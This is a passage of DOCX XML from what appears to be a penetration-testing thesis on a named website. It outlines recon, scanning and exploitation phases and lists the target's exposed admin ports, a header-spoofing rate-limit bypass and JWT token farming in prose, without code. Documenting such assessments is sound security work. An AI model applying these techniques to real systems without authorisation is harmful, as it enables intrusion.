                      <a:ext cx="5400000" cy="3602436"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 7: Penetration testing process diagram</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.1 Phase 1 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reconnaissance was the first and most time-intensive phase of the engagement. The goal was to map the entire publicly accessible attack surface of neuralsh.com before any active probing began. This phase used only passive and semi-passive techniques — primarily querying public records and observing what the target broadcast about itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Key activities included WHOIS registration lookups, DNS record enumeration (A, MX, TXT, NS, and CNAME records), and SSL certificate transparency log analysis. The most impactful discovery in this phase was the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>origin IP address (103.16.xx.xxx)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, obtained by resolving the MX record for the mail server. JavaScript bundle analysis of the Nuxt.js frontend also revealed internal API route structures, including the unauthenticated token endpoint that was later exploited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.2 Phase 2 — Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>With the origin IP identified, active scanning was conducted against 103.16.xx.xxx to determine which services were reachable from the internet. Nmap was used to perform a full TCP port scan, revealing a large number of open ports that should not have been publicly accessible — including port 2087 (WHM admin panel), port 3306 (MySQL), port 2083 (cPanel), port 9001 (MikroTik), and port 25 (SMTP). Web application enumeration using Dirb and Nikto identified accessible admin interfaces, exposed directory listings, and additional administrative endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.3 Phase 3 — Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The vulnerability assessment phase involved manually evaluating each discovered service against known vulnerability classes. Rather than relying solely on automated scanner output, manual analysis was performed on authentication flows, API endpoints, HTTP response headers, CORS configuration, and session token handling. All findings were mapped to OWASP Top 10 categories and scored using CVSS v3.1. This phase produced the complete findings register — 20 vulnerabilities across four severity bands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.4 Phase 4 — Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploitation was conducted in a controlled, non-destructive manner for findings where proof-of-concept demonstration was feasible without causing service disruption or data modification. Two exploitation chains were confirmed: rate limiting bypass via X-Forwarded-For header spoofing (50/50 requests bypassed) and JWT token farming via the unauthenticated token endpoint (50 valid tokens collected).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.5 Phase 5 — Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Post-exploitation analysis assessed the realistic impact of a successful initial compromise, conducted in read-only mode. This phase focused on tracing what attack paths would be available to an attacker who had reached each foothold — including shared hosting lateral movement risk and network infrastructure control via the exposed MikroTik panel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.6 Phase 6 — Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The reporting phase produced all deliverables: a full professional VAPT report, attack chain diagrams, and this thesis document. Every finding card was written with both a technical audience (the development and operations team) and a non-technical audience (management) in mind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4. OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="997795"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="owasp_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="997795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 8: OWASP (Open Web Application Security Project)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Open Web Application Security Project (OWASP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a nonprofit foundation dedicated to improving software security. Its most widely referenced publication is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a consensus-based list of the ten most critical web application security risks.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Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Failures in enforcing restrictions on what authenticated users are allowed to do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Weaknesses in how data is protected in transit or at rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Untrusted data sent to an interpreter as part of a command or query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Architectural flaws where security was not considered during the design phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Improperly configured permissions, unnecessary features enabled, default credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Use of components with known vulnerabilities that have not been patched</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Weaknesses in authentication — missing rate limiting, weak session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Software and Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Code and infrastructure that does not verify integrity of updates or pipelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Security Logging and Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Insufficient logging and alerting — allowing attacks to proceed undetected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Application fetches remote resources based on user-supplied input without validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Table 4: OWASP Top 10 (2021 — Current Reference)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Security Misconfiguration (A05) accounts for the majority of the 20 findings in this engagement, including the exposed WHM, cPanel, MikroTik, and MySQL interfaces. Identification and Authentication Failures (A07) covers the rate-limiting bypass and JWT token farming vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. NIST SP 800-115</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="2880000" cy="759750"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="nist_logo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="759750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 9: NIST SP 800-115 logo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
